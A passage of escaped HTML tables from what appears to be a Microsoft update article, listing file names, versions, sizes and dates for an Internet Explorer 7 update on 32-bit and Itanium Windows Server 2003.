class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">3,628,032</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">480,768</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msrating.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">102,912</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,172,992</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">18:37</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Webcheck.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">233,472</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">841,216</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported 32-bit versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.4.1</td><td class=\"sbody-td\">221,488</td><td class=\"sbody-td\">08-Jul-2010</td><td class=\"sbody-td\">14:23</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Advpack.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">124,928</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">347,136</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">214,528</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Extmgr.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">132,608</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">389,120</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">00:01</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Icardie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">63,488</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">00:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">153,088</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">230,400</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakui.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">03-Feb-2014</td><td class=\"sbody-td\">09:12</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">08-Jul-2010</td><td class=\"sbody-td\">23:31</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21371</td><td class=\"sbody-td\">388,608</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">78,336</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">6,108,672</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">991,232</td><td class=\"sbody-td\">08-Jul-2010</td><td class=\"sbody-td\">23:35</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">268,288</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">00:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">643,312</td><td class=\"sbody-td\">03-Feb-2014</td><td class=\"sbody-td\">09:13</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,830,912</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">496,128</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">52,224</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">3,628,032</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">480,768</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msrating.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">102,912</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,172,992</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Webcheck.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">233,472</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">841,216</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">06:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported Itanium-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.4.1</td><td class=\"sbody-td\">501,552</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:42</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Advpack.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">283,136</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">49,152</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">984,576</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">645,632</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Extmgr.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">328,192</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">965,632</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Icardie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">179,712</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">135,680</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">385,536</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">503,808</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakui.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">1,074,688</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21371</td><td class=\"sbody-td\">764,416</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">147,456</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">11,782,656</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">980,992</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">460,800</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">99,840</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">556,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">30,720</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">795,376</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">2,440,192</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,045,504</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">144,384</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">10,157,056</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,533,440</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msrating.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">492,032</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">2,233,344</td><td 